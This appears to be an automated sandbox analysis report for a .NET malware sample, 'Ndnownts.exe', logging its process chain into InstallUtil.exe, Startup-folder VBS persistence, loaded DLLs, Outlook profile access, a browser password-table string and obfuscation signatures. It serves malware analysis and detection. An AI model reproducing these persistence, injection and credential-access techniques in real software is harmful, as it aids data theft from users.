                Source: C:\Users\user\Desktop\Ndnownts.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: InstallUtil.exe, 00000001.00000002.4150876359.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000026AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000026BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000026CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Ndnownts.exeVirustotal: Detection: 69%
                Source: Ndnownts.exeReversingLabs: Detection: 45%
                Source: C:\Users\user\Desktop\Ndnownts.exeFile read: C:\Users\user\Desktop\Ndnownts.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Ndnownts.exe "C:\Users\user\Desktop\Ndnownts.exe"
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsInvalid.exe "C:\Users\user\AppData\Roaming\IsInvalid.exe"
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\Desktop\Ndnownts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsInvalid.exe "C:\Users\user\AppData\Roaming\IsInvalid.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Ndnownts.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Ndnownts.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ndnownts.exe, 00000000.00000002.1750536952.00000000037DA000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.000000000294A000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1752636794.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1750536952.0000000003762000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000003339000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ndnownts.exe, 00000000.00000002.1750536952.00000000037DA000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.000000000294A000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1752636794.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1750536952.0000000003762000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000003339000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: Ndnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, tilDvqDFLNhXNLqYPJa.cs.Net Code: Type.GetTypeFromHandle(GQO1cou3Yh7d1ImCQPc.XdUVDkNZgJ(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQO1cou3Yh7d1ImCQPc.XdUVDkNZgJ(16777252)),Type.GetTypeFromHandle(GQO1cou3Yh7d1ImCQPc.XdUVDkNZgJ(16777284))})
                .NET source code contains potential unpacker
                Source: Ndnownts.exe, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: IsInvalid.exe.0.dr, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Ndnownts.exe.6240000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 0.2.Ndnownts.exe.6240000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 0.2.Ndnownts.exe.6240000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 0.2.Ndnownts.exe.6240000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 0.2.Ndnownts.exe.6240000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.Ndnownts.exe.37da178.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.Ndnownts.exe.5500000.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 0.2.Ndnownts.exe.6310000.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1758641024.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1926811297.0000000003016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1741258818.0000000002626000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Ndnownts.exe PID: 4544, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IsInvalid.exe PID: 3688, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Ndnownts.exeCode function: 0_2_06C831C1 push eax; iretd 0_2_06C831C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_01579720 push esp; ret 1_2_01579721
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_05DD4EE5 pushad ; ret 4_2_05DD4EE6
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_05DD1913 push eax; ret 4_2_05DD191D
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074A2E0F push es; iretd 4_2_074A2E15
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074A1628 push ds; iretd 4_2_074A162F
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074A129E push ds; iretd 4_2_074A12A7
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074A1569 push ds; iretd 4_2_074A156F
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074A31C1 push eax; iretd 4_2_074A31C6
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeCode function: 4_2_074A15A0 push ds; iretd 4_2_074A15A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_04B12E78 push esp; iretd 7_2_04B12E79
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, D91jB1Y32wM9JU4tEos.csHigh entropy of concatenated method names: 'XedYyHFwSj', 'Lx8YbNS8pi', 's8sYF7PtHc', 'VRUYJOSMD8', 'E9rY7Io9r5', 'AwhO6TJvvDexoXatvnQ', 'BAQN2sJof3Qrvmn5aFT', 'vTdLfkJ5PZuIXTURVWl', 'b69V1WJBO5F2UJWMaXu', 'v01aLyJRgaqqldNiSHP'
                Source: 0.2.Ndnownts.exe.3671b78.5.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'WwSC4tIO0RJKhceuH7O'
